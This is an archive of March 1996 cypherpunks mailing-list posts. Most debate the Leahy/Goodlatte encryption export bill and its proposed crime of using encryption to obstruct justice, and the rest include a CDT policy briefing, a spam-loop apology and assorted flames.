To: cypherpunks@toad.com
Subject: Lawz to be.
Message-ID: <960306193119.20205a93@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Cut & Paste
>  "§2804. Unlawful use of encryption to obstruct justice"    
>   "Whoever willfully endeavors by means of encryption to obstruct,   
...
>Interesting wording - sounds almost like if you impede the *commission* of 
>a felony, you is been had. Keyword would seem to be "willingly".
Jim:
>You need to learn to read more carefully.  The word they (according to VTW) 
>used was "willfully," not "willingly."

Agree, problem was that to get into E-Mail had to cut/paste in 255 bytes
segments but the quoted part is what I got off VTW with minor line
length adjustment and separation of elements for clarity. 

>In any case, assuming they either never made the error you noticed, or they 
>manage to correct it before the bill becomes law, they will have just 
>outlawed the used of encrypted remailers, because:

No, what the wording seems to outlaw was the use of encryption to obstruct 
the commission of the crime, not the investigation.  Read it again please.

>> Suspect  they meant to say "...obstruct (etc) the investigation of a
>>felony..."

>Probably.  This section is their wish-list to Santa Claus.  It's easy to 
>make mistakes when you're excited about something.   They're hoping you 
>suckers will support the whole bill despite this booby-trap.  

Thought the gotcha was down in the part about the Secretary of Commerce. 
My reading is that the secretary will still be required to grant
approval for commercial export. Is past the part about no regulation
inside the US (which is true now - still would be nice to see a "Congress
shall make no law..."). The puzzler is the requirement that a comperable 
foreign product must exist before permission to export will be granted.

Will this be like "comparable product" price matching in discount houses ?
Somehow there never is one...
						Warmly,
							Padgett

ps did you mean the Thomases and Memphis ? Not aware of similar 
   prosecution in Oklahoma. Besides my understanding was that the online
   stuff was dropped, the conviction was for stuff sent through the mails.
   Is that incorrect ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 03:27:15 +0800
To: Voters Telecommunications Watch <cypherpunks@toad.com
Subject: Re: (INFO) Leahy/Goodlatte introduce crypto bill
Message-ID: <m0tuWWi-00091XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:17 PM 3/5/96 -0500, Voters Telecommunications Watch wrote:

Dear Mr. Sadfar,

By now I'm sure you've read a few items that I posted not only to you, but 
also to the cypherpunks mailing list, as well as the 
NWLIBERTARIANS@teleport.com list.  I believe you have made a grievous error 
in your position apparently supporting the Leahy bill.  As you presumably 
understand by now, based on your description of the bill it contains an 
extraordinarily serious flaw, in that it makes a new crime concerning the 
USE of encryption.

Ostensibly, this is "reasonable," but I've already presented a scenario on 
Cypherpunks (also posted to you; as I write this it may not yet have 
appeared there, but I copied you) in which the government uses this 
provision maliciously to go after anonymous remailers.  While that was 
merely a specific example, almost any service that protects the identity of 
its customers and allows them network access is potentially at a serious 
risk, because the US government has been known to fabricate a crime (for 
example, the "Amateur Action" BBS case from a few years ago) in order to 
make criminals out of non-criminals.

As you have quoted it, Leahy's bill allows the government to, in effect, 
"stalk" a service provider (anonymous encrypted remailer, anonymous digital 
cash bank, Internet access provider, etc) and create a crime that involves 
the provider well beyond the standards described in this bill.  The 
government can CREATE a crime, "to order" as it were, and snare the service 
provider in the net, despite the fact he has done nothing wrong. (In fact, 
he could be "guilty" even if there was no way, short of going out of 
business, to avoid the "crime.")   This, I hope you agree, is totally 
unacceptable, but despite this, you said: 

>This provision only applies to you if you are using encryption to
>specifically foil a law enforcement investigation AND the communication
>relates to a felony AND you are using the communication to commit the
>felony.  VTW feels this is a fairly narrowly drawn statute that is not
>likely to be easily abused.

Frankly, you made an error, and "it was a doozy!"  But what I fear is that 
you will "dig your heels in" and hesitate to admit it, and continue on 
calling this "a good bill."  You _would_ be right about that, except for the 
specific portion that is referred to above.

(In addition, as Padgett Petersen noticed on Cypherpunks, that portion of 
the bill seemingly contains an error of phrasing, although we can't tell and 
we are depending on your quoting of that bill.  Please verify that the 
quotation you made was accurate, and please carefully read that portion to 
see if you can identify the  problem both Mr. Petersen and I observed.  
Since it just about reverses the entire meaning of the paragraph, it is 
vital to know what the actual bill said and meant.)

I strongly recommend that you _DRAMATICALLY_ change the tone of your 
support:  Please make it clear that your support for this bill is ENTIRELY 
conditional on removing the offending section. (I see little or no problem 
with your description of the rest of the bill, except for a few items I 
mention below.)  I certainly invite any challenge you'd care to make to my 
reasoning and logic:  If you feel I'm wrong in my estimation of what the 
government could do with that portion of the bill, say so and back up your 
analysis.  If, on the other hand, you recognize that I'm right, or at least 
on the right track, I think you have a certain moral responsibility 
to ensure that this "wolf in sheep's clothing" doesn't get by the shepherd.

Remember, in your press release you said:

>VTW believes this legislation is an excellent initiative. 


It would be far more accurate to say, "This legislation COULD BE an 
excellent initiative, if a short section were removed."

>We predict that the White House will do everything in their power to
>prevent Senator Leahy from liberating PGP.  He will need your help to
>push forward.

If this is REALLY true, then he will have to listen to our suggestions, 
right?  People listen WHEN THEY HAVE TO CONVINCE YOU OF SOMETHING.  Failing 
to make Leahy aware of what we consider terribly wrong with that bill would be 
irresponsible.  If Leahy REALLY wants the bill passed, and "all" the 
potential supporters insist on the removal of the offending section, he will 
have no choice but to do so, since it has already been widely predicted that 
the administration will oppose it.  If, indeed, they will oppose it, they 
will oppose it REGARDLESS of whether it contains that bad spot or not.


>Over the next few months, VTW will be coordinating a coalition of
>names, many of which are already familiar to you.  This coalition will
>ask you to call and write to Congress, expressing your opinion, and
>threatening to back it up with the ultimate legitimate weapon of
>democracy, your vote in this election year.

While I do indeed intend to vote in this election year, as you may be aware 
I believe there are other weapons the public will eventually be able to use 
against recalcitrant politicians and government employees of all types.  The 
government is presumably well aware of my position, and it would certainly 
not be unexpected if they were desperately trying to avoid what I consider 
to be an inevitable conclusion.  This particular bad section, in what is 
probably an otherwise-good bill, seems tailor-made to fight against 
developments that I think this society and "our" government can't avoid, and 
shouldn't avoid.

I'm not asking you to endorse, or for that matter even acknowledge, my 
theories.  However, you should at least take notice of the fact that 
Congress' motivations are clearly to maintain its power over the citizenry, 
and they will presumably act in predictable fashion to achieve this goal.  
We've already got them on the run; they can't pass Clipper and they knew 
they couldn't prosecute Zimmermann, and their position on ITAR is 
resoundingly criticized by individuals and industry alike.  Most people 
agree that these rules have to change; it would be a tragedy if we "gave 
away the store" just to get a few trinkets.  

The fact is, this bill didn't have to contain the offending section, and it 
doesn't have to keep it.  If we make our absolute opposition to that portion 
clear, who will stand up and support it?  Only those people within 
government who secretly want this bill to pass, that's who!


____________________________________________________________
>A FEW QUESTIONS AND ANSWERS
>

>Q: Wasn't Goodlatte one of the bad guys on the Communications Decency Act?
>   Why is he sponsoring this bill, and can we trust him?
>A: Goodlatte did indeed introduce the fatal amendment that made the House
>   version of the Telecomm Bill unsupportable. Nevertheless, VTW has found
>   that a Congressperson's vote on one sort of bill is little indication of
>   his or her stand on others. VTW wil closely examine any change in the
>   language of the bill throughout its Congressional life.

Well, frankly, it looks like SOMEBODY managed to sneak in a pit into the 
cherry pie.   (or a worm into the apple!)   I wonder who could have done 
this?  What do you want to bet that there aren't any fingerprints on it?!?


>Q: Does this create a new obligations for key holders to disclose keys that
>   they wouldn't have to comply with before?
>A: No. In fact, this bill makes it harder for a law enforcement official to
>   retrieve a key from a key holder, by requiring a wiretap request instead
>   of a simple search warrant.

In my opinion, key escrow agents should be required to inform THEIR CLIENT, 
the actual user of the key, BEFORE giving the key to the cops. They should 
also be obligated to fight any such request if the key holder requests it.  
(Remember, if key-escrow is really voluntary, then it is a contract between 
the encryption-user and the key escrow agent, and the encryption user should 
be able to put whatever conditions he wishes on that relationship.  
Presumably, he would not have entered into that relationship unless he was 
able to control the disposition of the key.) Furthermore, the cops should 
not be allowed to do any decryption of any material wiretapped before they 
possess the key itself.


In summary, I think you really need to revisit your support for this bill.  
It is only a short distance away from being a good bill, but that is a trip 
we must make if we are to protect and even expand our freedom.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT5aHPqHVDBboB2dAQEACwP/eDky+Gi0kebbAWPYO9dX9HCQTzac3m3v
YVyW4iEtGrQE78/Hmi4M2m9l4sDA3qOaFZtFhImRc4JVVWNy1Yp8JzTPbjESiB4M
Q3ppLV7S9sQmYQnHIHbpJu9YVQ/j+cMIwp9tOI0FNLbXIKWhZz4t+6bfiqJWUgZK
awsbDpXjYaU=
=3HJl
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!news.cais.net!news.cais.com!news@warwick.com
Date: Thu, 7 Mar 1996 11:05:38 +0800
To: cypherpunks@toad.com
Subject: Ignore
Message-ID: <4hkqiq$6rs@news.cais.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
   _____ _____ _______
  / ____|  __ \__   __|   ____        ___               ____             __
 | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
 | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
 | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
  \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
  The Center for Democracy and Technology  /____/     Volume 2, Number 9
----------------------------------------------------------------------------
     A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 9                        March 5, 1996

 CONTENTS: (1) Bills To Relax Crypto Export Controls Introduced by Leahy,
               Burns, Goodlatte, Others
           (2) Subscription Information
           (3) About CDT, contacting us

This document may be redistributed freely provided it remains in its entirety
       ** Excerpts may be re-posted by permission (editor@cdt.org) **
-----------------------------------------------------------------------------

(1) BIPARTISAN BILLS TO EASE ENCRYPTION CONTROLS AND PROTECT INTERNET PRIVACY
    INTRODUCED IN SENATE AND HOUSE

A bipartisan group of members from both houses of Congress today introduced
legislation to lift many export controls on strong encryption hardware and
software and affirm the rights of Americans to use whatever form of
cryptography they choose. The bills, sponsored by Sen. Leahy (D-VT), Sen.
Burns (R-MT), Rep. Goodlatte (R-VA), Rep. Eshoo (D-CA), and others,
represent a major step towards breaking the stranglehold on encryption
technologies which for years has denied computer users access to vital
privacy-protecting applications.

The "Encrypted Communications Privacy Act of 1996" represents a rejection
of the Clinton Administration's invasive and unworkable "Clipper Chip" and
"Clipper II" key escrow policies. Under the guise of promoting so-called
"voluntary" encryption standards, these Administration efforts have sought
to use export controls to compel the adoption of key escrow encryption
domestically, and have left Internet users without adequate privacy and
security.

By relaxing export controls on "generally available" cryptographic
applications such as PGP, popular Web browsers, and other programs, the
Encrypted Communications Privacy Act of 1996 would encourage the
development and use of strong privacy protecting technologies. Major
provisions of the legislation would:

* Ease export controls on encryption products, allowing the export of
  'mass market' or 'generally available' cryptography. This would
  include products such as PGP or many of the popular Web browser
  programs.

* Affirm the right of Americans to use any encryption domestically. The
  bills explicitly prohibit the government from imposing any limits
  on the domestic use or sale of encryption.

* (Senate version only) Provide protections to those who choose to store
  their encryption keys with third parties by creating criminal and
  civil  penalties for the unauthorized disclosure of keys and strict
  requirements for law enforcement access.  The bill does not in any way
  affect the ability of any person to use encryption without a key
  escrow function..

The legislation also contains several provisions which CDT believes require
further clarification and consideration, including controversial language
that would create a new federal crime for the use of encryption to
willfully obstruct a law enforcement investigation. CDT will work with
Senators Leahy and Burns and Representatives Goodlatte, Eshoo, and other
interested members to address these concerns as the bill makes its way
through the legislative process.

The full text of both the House and Senate versions of the bills, along
with other relevant background information, is available on CDT's Crypto
Issues World Wide Web page:

  http://www.cdt.org/crypto/

CDT believes that the House and Senate encryption bills are an important
step forward in the ongoing attempts to build better security into the
information infrastructure through the widespread availability of
encryption. Congressional action is particularly welcome as the
Administration has continued to impose a flawed approach to encryption
based upon export controls, key length limits, and key escrow policies all
aimed at slowing the adoption of strong cryptography in the U.S. and
throughout the world.

While CDT believes improvements can be made in both bills, they establish a
solid framework for building a comprehensive, global cryptography policy.
CDT believes the bills deserve careful consideration and support. We look
forward to working with Senator Leahy, Senator Burns, Rep. Goodlatte, Rep.
Eshoo, individual Internet users, public interest advocates, and the
computer and communications industry to develop a cryptography policy that
protects privacy, security, and competitiveness on the Global Information
Infrastructure.

SUMMARY OF THE LEGISLATION: WHAT THE BILLS WOULD DO

The House and Senate bills both modify Title 18 of the U.S. Code to clarify
the status of encrypted communications, access to those communications by
law enforcement, and the liability of third-party key holders.  The bills
would:

* SIGNIFICANTLY EASE EXPORT CONTROLS: The bills would remove all export
  restrictions on "mass market" or publicly accessible encryption
  software and similar hardware -- that is, products that are generally
  available to the public and sold for installation "as is," or that are
  in the public domain such as PGP or some popular web browsers. (For
  example, products commercially available "off the rack," or freely
  available to the public via the Internet, would all be exportable.)
  Other encryption hardware would be exportable to countries where
  hardware with similar capabilities is already commercially available.
  The bills also allow export of other encryption software if it is
  currently exportable under law for use by foreign financial
  institutions.

* PROHIBIT ANY RESTRICTION ON THE DOMESTIC USE OR SALE OF ENCRYPTION:
  The bills would affirmatively prohibit any government restrictions or
  attempts to mandate the domestic sale or use of any type of
  encryption.

* IMPOSE CIVIL AND CRIMINAL LIABILITY FOR UNAUTHORIZED KEY DISCLOSURES:
  (Senate Version Only) The Senate bill would lay down privacy
  guidelines to protect those users who choose to store their  keys with
  third parties. The bill would impose civil and criminal penalties for
  the unauthorized release of decryption keys or other decryption
  assistance by third parties who individuals have entrusted with their
  keys. No privacy protections and only limited restrictions for law
  enforcement access currently exist for those who choose to store their
  keys with trusted third parties.

* PROVIDE LIMITS FOR ACCESS TO KEYS BY LAW ENFORCEMENT: (Senate Version
  Only) The Senate bill would also spell out limits and guidelines for
  law enforcement access to the keys of those users who have
  chosen to store their keys with third parties. Today, encryption keys
  held by third parties could be released to law enforcement with
  nothing more than a subpoena. Under the Senate bill, third parties
  could only provide assistance to law enforcement in decrypting
  communications if presented with a court order. The bill also limits
  the scope and duration of such assistance. Decryption keys for stored
  communications could be disclosed with a proper court order or
  subpoena.

* ESTABLISH A BROAD "PERSONAL USE EXEMPTION" FOR U.S. TRAVELERS: The
  bills would allow U.S. persons to use any form of encryption in a
  foreign country, establishing a less restrictive form of the "personal
  use exemption" recently published by the State Department. The
  provision is intended to accommodate "U.S. citizens and permanent
  residents who have the need to temporarily export encryption products
  when leaving the U.S. for brief periods of time". While the intent of
  this provision is clear, CDT believes that the language of the bill
  should be further clarified.

* PROHIBIT THE USE OF ENCRYPTION TO CONCEAL THE COMMISSION OF A FELONY:
  Finally, the bills would criminalize the use of encryption to
  willfully obstruct justice.  Anyone who "willfully endeavors" to use
  encryption for the purpose of obstructing, impeding, or preventing the
  communication to a law enforcement officer of information relating to
  a Federal felony would be subject to criminal penalties. CDT believes
  this new federal crime is unnecessary since it duplicates obstruction
  of justice crimes that are already available to prosecutors, and is
  unwise since it might be interpreted to discriminate against users of
  encryption.

BACKGROUND - BILLS ADDRESS LONG-STANDING FRUSTRATIONS WITH U.S.
             ENCRYPTION POLICY

Congressional action comes as Clinton Administration encryption
restrictions continue to jeopardize the security of computer users.
Encryption tools, which scramble electronic communications and data, are
widely viewed as the key to providing security and privacy and encourage
commerce on the Global Information Infrastructure.

Individuals need encryption in order to trust the GII with confidential
data such as financial transactions, medical records, or private
communications.  Businesses need encryption to provide individuals with
privacy protections they need and to protect their own proprietary
information as it flows across vulnerable global networks. The lack of good
encryption today has left computer users vulnerable to the prying eyes of
hackers, corporate competitors, and even foreign governments.

Current Administration policy restricts the export of "strong" encryption
hardware or software products with keys greater than 40 bits long. (The
length of encryption "keys" is often used to indicate the security of a
system.) Export controls actually influence the entire GII -- both
domestically and internationally -- due to the difficulty of distributing
and interoperating products with different strengths of encryption. The
level of security permitted under the export controls, and hence the level
of security largely available to domestic users as well, has been judged
woefully inadequate by many experts. Even the most recent Administration
"Clipper II" proposals would only allow the export of moderately stronger
encryption, and then only with "key escrow" restrictions to guarantee U.S.
government access to individual keys -- restrictions which raise real
Constitutional issues and are bound to fail in the competitive
international marketplace.

In recent months, groups from across the political spectrum have
increasingly criticized the Clinton Administration's restrictive export
controls. In November 40 companies, trade associations, and public interest
groups wrote to Vice President Gore calling the latest Administration
proposals flawed and inadequate. Last month a report by the CEOs of 13
leading U.S. technology companies found that U.S. industry stands to lose
up to $60 billion dollars per year by the year 2000 due to restrictions on
the export of cryptography. And several weeks ago a group of noted computer
security experts released a report calling for the deployment of
dramatically longer encryption key lengths of at least 75 to 90 bits.

The House and Senate bills give voice to this growing drumbeat of criticism
demanding a radical departure from the flawed approach of the Clinton
Administration's current encryption polices. CDT looks forward to working
with members of Congress to push for a more comprehensive U.S. encryption
policy that reflects the privacy and security needs of computer users.


FOR MORE INFORMATION

More information on the cryptography policy debate, including the text of
the Senate and House bills, is available on CDT's Cryptography Issues
Web Page:

http://www.cdt.org/crypto/

For More Information Contact:

Center for Democracy and Technology    +1.202.637.9800
  Daniel Weitzner, Deputy Director    <djw@cdt.org>
  Alan Davidson, Staff Counsel        <abd@cdt.org>

-----------------------------------------------------------------------
(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.9                                           3/5/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 00:53:37 +0800
Subject: No Subject
Message-ID: <QQafyc09912.199603070132@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Ayse Sercan wrote:

> At any rate, if I were the mother, and my kid was being led away by a
> clerk who could have been the very pervert who thought that those nude
> pictures meant child pornography, I'd certainly do everything in my power
> to protect my child from such an individual.

That's rediculous. The mother did not flip because Zona led the child away.
The mother flipped when asked about the photos. This caused Zona to not
want the child to see argument. The mother just has serious problems in
general. She feels justified in trashing the place and throwing the lamp,
which is why she refused the punishment and took 30 days in jail. She,
in the presence of her child, was wrong to get violent. She has a lack of
control.

-- 

617/253-6515   http://grim.media.mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "harry's panix mail" <panix@warwick.com>
Date: Thu, 7 Mar 1996 15:40:18 +0800
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Sorry for looping feed
In-Reply-To: <0lDXZl200bl40Y40M0@andrew.cmu.edu>
Message-ID: <199603070132.UAA22692@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


SOrry. Not an intentional spam.... but rather a software
bug. It has been stoped.

Harry Hawk
Ray Cromwell





> 
> Please stop this spam addressed to cypherpunks@toad.com, now.
> 
> Sincerely,
> 
> Declan
> 
> 
> ---------- Forwarded message begins here ----------
> 
> X-Andrew-WideReply: internet.cypherpunks
> X-Added: With Flames (listbb v2.2)
> Return-path: <owner-cypherpunks@toad.com>
> X-Andrew-Authenticated-as: 0;andrew.cmu.edu;Network-Mail
> Received: from po2.andrew.cmu.edu via trymail for
> arpalists+cypherpunks@andrew.cmu.edu (->listbb+cypherpunks)
>           ID </afs/andrew.cmu.edu/usr0/listbb/Mailbox/0lDXLUK00UdaMX8U4g>;
>           Wed,  6 Mar 1996 20:03:29 -0500 (EST)
> Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by
> po2.andrew.cmu.edu (8.7.4/8.7.3) with ESMTP id UAA08989 for
> <arpalists+cypherpunks@andrew.cmu.edu>; Wed, 6 Mar 1996 20:03:25 -0500
> Received: from toad.com by relay3.UU.NET with SMTP 
> 	id QQafxy03661; Wed, 6 Mar 1996 19:36:29 -0500 (EST)
> Received: by toad.com id AA09621; Wed, 6 Mar 96 16:36:07 PST
> Received: from waterville.warwick.com by toad.com id AA09600; Wed, 6 Mar
> 96 16:35:57 PST
> Received: from cmyk.warwick.com by waterville.warwick.com
> 	id VAA08365 for <cypherpunks@toad.com>; Tue, 5 Mar 1996 21:52:33 -0800
> Received: by cmyk.warwick.com
> 	id TAA21695 for cypherpunks@toad.com; Wed, 6 Mar 1996 19:30:02 -0500
> Received: from GATEWAY by cmyk.warwick.com with netnews
> 	for cypherpunks@toad.com (cypherpunks@toad.com)
> To: cypherpunks@toad.com
> Date: Thu, 7 Mar 1996 00:01:36 GMT
> Message-Id: <DnvEqp.8yM@pwa.acusd.edu>
> Organization: The Fractal Images Company
> Content-Type: text/html
> From:
> uunet!in2.uu.net!newsfeed.internetmci.com!info.ucla.edu!ihnp4.ucsd.edu!pwa
> .acusd.edu!news@warwick.com
> Subject: test
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> Test
> ---
> Robert Uomini
> The Fractal Images Company (http://www.fractals.com)
> Voice: 510-528-0258/800-548-0258
> Fax:   510-528-0243
> *******************************************************************************
> *  Buying or selling a home? Come visit the most comprehensive set of	      *
> *  residential real estate listings and related services on the Internet:     *
> *  The FractalNet Real Estate Server, http://www.fractals.com/realestate.html *
> *******************************************************************************
> ----------
> X-Fractalimgs-Data-Name: sample.html
> X-Fractalimgs-Content-Length: 1255
> 
> <html>
> <head>
> <title>FractalNet Home Page</title>
> </head>
> 
> <body>
> <p>
> This is a test of WebReader. This line should appear as text in the font
> chosen by the user, as defined in the Properties file. A horizontal rule
> follows:
> <hr>
> <h1>FractalNet Advertisers</h1>
> <hr>
> <ul>
> <li>Unordered item #1
> <li>Unordered item #2
> <li>Unordered item #3
> <li>Unordered item #4
> </ul>
> <ol>
> <li>Ordered item #1
> <li>Ordered item #2
> <li>Ordered item #3
> <li>Ordered item #4
> </ol>
> <ol>
> <li>Ordered item #5
> <li>Ordered item #6
> <li>Ordered item #7
> <li>Ordered item #8
> </ol>
> <hr>
> <h2>FTP icon</h2>
> <blockquote>
> Swearest thou, ungracious boy? Henceforth, ne'er look upon me. There is
> a devil haunts thee in the likeness of an old, fat man. A tun of man is
> thy companion. Wherein is he neat and cleanly, but to carve a capon and
> to eat it? Wherein is he cunning, but in craft? Wherein is he crafty,
> but in villainy? Wherein is he villainous, but in all things? Wherein is
> he worthy, but in nothing?
> </blockquote>
> <hr>
> <address>
> Bob
> <br>
> Bob's address
> <br>
> </address>
> <dl>
> <dt>Term 1:
> <dd>This is the first definition
> <dt>Term 2:
> <dd>This is the second definition
> <dt>Term 3:
> <dd>This is the third definition
> </dl>
> </body>
> </html>
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 7 Mar 1996 15:30:40 +0800
To: cypherpunks@toad.com
Subject: Garbage from warwick.com stopped
In-Reply-To: <199603070132.UAA22692@cmyk.warwick.com>
Message-ID: <0lDXyF200bl40Y43I0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message begins here ----------

From: "harry's panix mail" <panix@warwick.com>
Message-Id: <199603070132.UAA22692@cmyk.warwick.com>
Subject: Sorry for looping feed
To: declan+@CMU.EDU (Declan B. McCullagh)
Date: Wed, 6 Mar 1996 20:32:09 -0500 (EST)
Cc: cypherpunks@toad.com (Good Guys)
In-Reply-To: <0lDXZl200bl40Y40M0@andrew.cmu.edu> from "Declan B.
McCullagh" at Mar 6, 96 08:18:41 pm

SOrry. Not an intentional spam.... but rather a software
bug. It has been stoped.

Harry Hawk
Ray Cromwell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 7 Mar 1996 16:15:41 +0800
To: schneier@couterpane.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
In-Reply-To: <199603062058.MAA28987@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.960306211246.8558A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> WHAT THE FUCK??????????????????????????????????????????
> 
> EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
> have all come out against this piece of shit. But with these so called
> experts baking it it could pass anyway.
> 
> Maybe the ltrs are a forgery? We should ask them, and if this is true, LETS
> SEND THEM A MESSAGE!!!!!!!! SWITCH YOUR PHONE SERVICE AND TELL AT&T WHY!!!
> STOP RECOMMENDING APPLIED CRYPTO (THERE ARE EASIER BOOKS ANYWAY). DEMAND
> THAT THESE PEOPLE STOP GIVING AWAY YOUR RIGHTS!!!!!!!!!!!!!!!!!!!!!!!!!!!

I'm not so much concerned about who supports key eskrow, I just want to
learn about cryptography! I sent away for my copy of Applied Cryptography
many months ago and it has yet to show up.

Bruce, please ship out a book to me!

(I would also appreciate a list of these "easier" bookst hat you mention,
as well as any free on-line information on crypto)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in1.uu.net!gwu.edu!dazed@warwick.com (John Nowicki)
Date: Sun, 10 Mar 1996 14:28:21 +0800
To: cypherpunks@toad.com
Subject: Re: If yer a fan of Matt Meow Meow Bruce, Pee Pee Herman, Rush Limbaugh, Grillo, Mark Staloff, Charles Nelson Reilly, Meg Tilly, Naomi Judd, Larry Storch, O. J. Simpson, Liberace, Judy Garland, or George Kirby, you won't want to miss this!
In-Reply-To: <4h0f9e$p4f@guitar.sound.net>
Message-ID: <4hl127$2b2@cronkite.seas.gwu.edu>
MIME-Version: 1.0
Content-Type: text/plain


: If it is some college prank, I think that the people responsible should 
: make an apology to Dr. Alan Keyes, who is a candidate for the presidency
: of the United states and a rare vioce of sanity in a world of braying
: jackasses like Slick Willie Clinton and his boss.  I say impeach them both
: and kick wiesenheimers like the idiot who started this thread into jail
: where they belong and let them work for a living.

Uh...this seems to be x-posted to my group as well...but I couldn't let 
this slip by...

Alan Keyes associated with sanity?!?!??

Bwahahahahahahahahahahhahahahahahahahahahaahhahahahahahahahaha

Please, a theocratic moron who thinks we should all live in accordance 
with his little monotone view of the world?

You may now return to your normal lives.

-------------------------------------------------------------------------
John Nowicki (dazed@gwis2.circ.gwu) : "There's one way to find out if a
1818 Kalorama N.W. #23              : man is honest- ask him. If he says
Washington D.C. 20009               : yes, you know he is crooked"- GM
----------------------------------(7x1)----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 7 Mar 1996 18:00:26 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <v02140b01ad63b7000129@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
>At 11:37 AM 3/6/96 -0800, Jim McCoy wrote:
>>        2- The phone companies (actually ACTA, the telco lobby) petitioned
>>           the FCC on Monday to regulate the Internet phone software
>>           companies.
>>
>>IP phone systems themselves may need to move underground just to
>>escape regulation.  OTOH, there is nothing to prevent people from
>>building their own systems once some free software is out there...
>
>That would be a super neat trick since the LD business is currently
>deregulated (and in fact was never a government monopoly) and the local loop
>is in the process of deregulation, and Vocaltec is in some senses an Israeli
>company anyway and need not have a presence in New Jersey if it doesn't
>want do.
>

The regulation in question was regarding things like local/state/federal
telecom taxes and levies, and all of the BS hoops that LD carriers must
jump through.  Regarding where such companies are located, I am also at
a loss as to how this recent action will be enforced; that does not
necessarily mean that a bureaucrat somewhere will not try to do something
stupid.

Just because LD is "deregulated" does not mean that it is without any
governmental oversight, much as I wish it were...  LD companies still
have to pay certain taxes (take a look at your next phone bill, they are
clearly listed in addition to your actual phone charges) and I am certain
that they have entire office buildings stuffed with drones filling out
paperwork for Uncle Sam...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 11 Mar 1996 06:21:29 +0800
To: cypherpunks@toad.com
Subject: Re: Lawz to be.
In-Reply-To: <960306193119.20205a93@hobbes.orl.mmc.com>
Message-ID: <199603070255.VAA11866@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> No, what the wording seems to outlaw was the use of encryption to obstruct 
> the commission of the crime, not the investigation.  Read it again please.
> 
I suppose you could parse it that way if you really wanted to, but it seems
to me that the obvious meaning of this rather tortured language:
  "Whoever willfully endeavors by means of encryption to obstruct, impede, or
   prevent the communication of information in furtherance to a felony which
   may be prosecuted in a court of the United States, to an investigative or
   law enforcement officer shall..."
is "...willfully endeavoring to obstruct by means of encryption the
communication to an investigative or law enforcement officer information that
is in furtherance of a felony..."

I think no reasonable person (judge, jury or prosecutor) would interpret
it any other way.  Fortunately, the law is not a program that gets run on a
computer.  People have to interpret it.  In the case of this section, the
awkward wording is an artificat of several iterations of narrowing it from
what was originally a rather broad crime (as it still is in the House bill).
I would rather have the awkward (but still clear) wording than a broader crime.
As it stands, several lawyers whose judgement I trust have told me that this
provision is worded narrowly enough to apply only to people who can already
be conviceted of the underlying crime and who can be proven to have used 
encryption for the SOLE purpose of thwarting law enforcement.  I don't like
this new crime (since it still stigmatizes encryption as being something
criminals use), but I can probably live with it.

